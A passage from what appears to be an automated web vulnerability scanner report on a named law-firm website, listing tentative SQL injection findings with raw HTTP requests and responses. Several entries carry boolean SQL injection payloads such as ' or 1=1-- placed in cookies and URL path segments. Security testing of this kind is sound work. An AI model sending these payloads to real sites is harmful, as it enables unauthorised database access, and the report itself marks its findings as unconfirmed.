<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.v
...[SNIP]...

1.26. http://www.curtis.com/favicon.ico [__utmc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /favicon.ico

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads 35245083%20or%201%3d1--%20 and 35245083%20or%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=12670236735245083%20or%201%3d1--%20; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMC=;expires=Sun, 18-Apr-2010 17:01:11 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=12670236735245083%20or%201%3d2--%20; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.v
...[SNIP]...

1.27. http://www.curtis.com/favicon.ico [__utmz cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /favicon.ico

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads 16393691'%20or%201%3d1--%20 and 16393691'%20or%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)16393691'%20or%201%3d1--%20; CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:00:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMZ=;expires=Sun, 18-Apr-2010 17:00:42 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)16393691'%20or%201%3d2--%20; CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:00:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.v
...[SNIP]...

1.28. http://www.curtis.com/favicon.ico [sifrFetch cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /favicon.ico

Issue detail

The sifrFetch cookie appears to be vulnerable to SQL injection attacks. The payloads 10585096'%20or%201%3d1--%20 and 10585096'%20or%201%3d2--%20 were each submitted in the sifrFetch cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true10585096'%20or%201%3d1--%20; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:00:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SIFRFETCH=;expires=Sun, 18-Apr-2010 17:00:31 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true10585096'%20or%201%3d2--%20; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:00:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.v
...[SNIP]...

1.29. http://www.curtis.com/flash/curtis.swf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /flash/curtis.swf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 52212528'%20or%201%3d1--%20 and 52212528'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flash52212528'%20or%201%3d1--%20/curtis.swf HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; CFID=6175843; CFTOKEN=32575697; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:15:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysear
...[SNIP]...

Request 2

GET /flash52212528'%20or%201%3d2--%20/curtis.swf HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; CFID=6175843; CFTOKEN=32575697; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:15:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
-->
...[SNIP]...

1.30. http://www.curtis.com/flash/curtis.swf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /flash/curtis.swf

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 21436775'%20or%201%3d1--%20 and 21436775'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flash/curtis.swf21436775'%20or%201%3d1--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; CFID=6175843; CFTOKEN=32575697; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:15:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysear
...[SNIP]...

Request 2

GET /flash/curtis.swf21436775'%20or%201%3d2--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; CFID=6175843; CFTOKEN=32575697; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:15:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
-->
...[SNIP]...

1.31. http://www.curtis.com/scripts/DateRange/ipopeng.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/DateRange/ipopeng.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 23520338'%20or%201%3d1--%20 and 23520338'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts23520338'%20or%201%3d1--%20/DateRange/ipopeng.htm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

